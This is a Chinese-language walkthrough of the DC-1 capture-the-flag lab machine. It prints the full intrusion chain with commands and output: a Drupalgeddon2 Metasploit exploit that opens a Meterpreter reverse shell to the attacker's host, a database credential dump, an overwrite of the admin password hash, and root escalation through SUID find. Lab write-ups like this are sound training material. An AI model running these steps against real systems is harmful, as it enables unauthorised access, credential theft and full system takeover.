【offensive-security】3.DC-1靶機(jī)

dc-1_1.png

一、獲取靶機(jī)信息

1.已知信息：

• IP: 192.168.245.193

2.獲取信息：

• nmap掃描開啟的服務(wù)

┌──(root?0xlo0p)-[/home/lo0p]
└─# nmap -sV -A 192.168.245.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 14:45 CST
Nmap scan report for 192.168.245.193
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          50550/tcp6  status
|   100024  1          55270/udp   status
|   100024  1          55271/udp6  status
|_  100024  1          57092/tcp   status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/26%OT=22%CT=1%CU=31332%PV=Y%DS=2%DC=T%G=Y%TM=6358D7
OS:C6%P=aarch64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%II=I%TS=8)S
OS:EQ(SP=106%GCD=1%ISR=109%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M
OS:54ENNT11NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=389
OS:0%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   429.93 ms 192.168.49.1
2   430.05 ms 192.168.245.193

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds

首先先查看80端口，是一個(gè)CMS站點(diǎn)，Drupal 7 上msf查看有無可利用的漏洞

• MSF getshell Drupal 7

┌──(lo0p?0xlo0p)-[~]
└─$ msfconsole                                        

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter 
session on many platforms using sessions -u 
<session_id>

msf6 > search Drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

有N多選擇，這里我測(cè)試了使用2018年的API屬性注入漏洞

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.245.193
rhosts => 192.168.245.193
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.49.245
lhost => 192.168.49.245
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.49.245:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.245.193
[*] Meterpreter session 1 opened (192.168.49.245:4444 -> 192.168.245.193:40926 ) at 2022-10-26 14:52:33 +0800

meterpreter > shell
Process 3438 created.
Channel 0 created.
ls    
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
cat flag1.txt
Every good CMS needs a config file - and so do you.

進(jìn)入shell以后發(fā)現(xiàn)當(dāng)前用戶為www-data，是一個(gè)低權(quán)限用戶，當(dāng)前目錄下有一個(gè)flag1.txt，提示我們?nèi)ゲ檎乙幌逻@個(gè)cms站點(diǎn)的配置文件，于是乎去百度

Drupal 默認(rèn)安裝的目錄結(jié)構(gòu) - 騰訊云開發(fā)者社區(qū)-騰訊云 (tencent.com)

配置文件在： sites/default/settings.php，下面截取重要信息部分

cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**

拿到了數(shù)據(jù)庫(kù)的庫(kù)名、用戶、密碼以及第二個(gè)flag提示，于是我們進(jìn)去數(shù)據(jù)庫(kù)看看

python -c 'import pty;pty.spawn("/bin/bash")'         
www-data@DC-1:/var/www$ mysql -u dbuser -pR0ck3t
mysql -u dbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 79
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use R0ck3t
use R0ck3t
ERROR 1044 (42000): Access denied for user 'dbuser'@'localhost' to database 'R0ck3t'
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

先使用python創(chuàng)建一個(gè)交互式的shell，否則進(jìn)不去mysql

我們經(jīng)過查詢，拿到了該站點(diǎn)的用戶表數(shù)據(jù)，但是密碼是加密的，這個(gè)時(shí)候想想上面flag2的提示

Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

暴力和字典攻擊并不是獲得訪問權(quán)限的唯一途徑（而且您需要訪問權(quán)限）。你能用這些憑據(jù)做什么？

提示不一定需要爆破，那我們就去百度一下Drupal的密碼加密規(guī)則

如何重置Drupal 7的用戶密碼 - 雨滴米 - ITeye博客

www-data@DC-1:/var/www$ php scripts/password-hash.sh "123456"
php scripts/password-hash.sh "123456"

password: 123456                hash: $S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA

拿到了新的hash，我們進(jìn)mysql update一下就可以登錄了

mysql> update users set pass='$S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';
<dTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';                       
Query OK, 1 row affected (0.01 sec)
Rows matched: 1  Changed: 1  Warnings: 0

修改后我們進(jìn)入web系統(tǒng)，使用admin登錄，并且找到了flag3的提示

dc-1_2.png

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

特殊的PERMS將有助于找到密碼，但您需要執(zhí)行該命令來確定如何獲取陰影中的內(nèi)容。

提示給的很到位了，我們?nèi)ゲ檎揖哂蠸UID權(quán)限的可執(zhí)行文件

www-data@DC-1:/var/www$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

一眼看中了find命令，https://gtfobins.github.io/gtfobins/find/ 找到了find的利用點(diǎn)，并成功提權(quán)root，拿到了第一個(gè)key和flag4提示

www-data@DC-1:/var/www$ find . -exec /bin/sh \; -quit
find . -exec /bin/sh \; -quit
# whoami
whoami
root
# cd /home
cd /home
# ls
ls
flag4  local.txt
# cat local.txt
cat local.txt
a68de45775de2a3c662c669556630844
# cd flag4
cd flag4
# ls  
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

我們進(jìn)root的目錄看下

# cd /root
cd /root
# ls
ls
proof.txt  thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# cat proof.txt
cat proof.txt
f06c05f682238e5ea97034108a9caa74

收工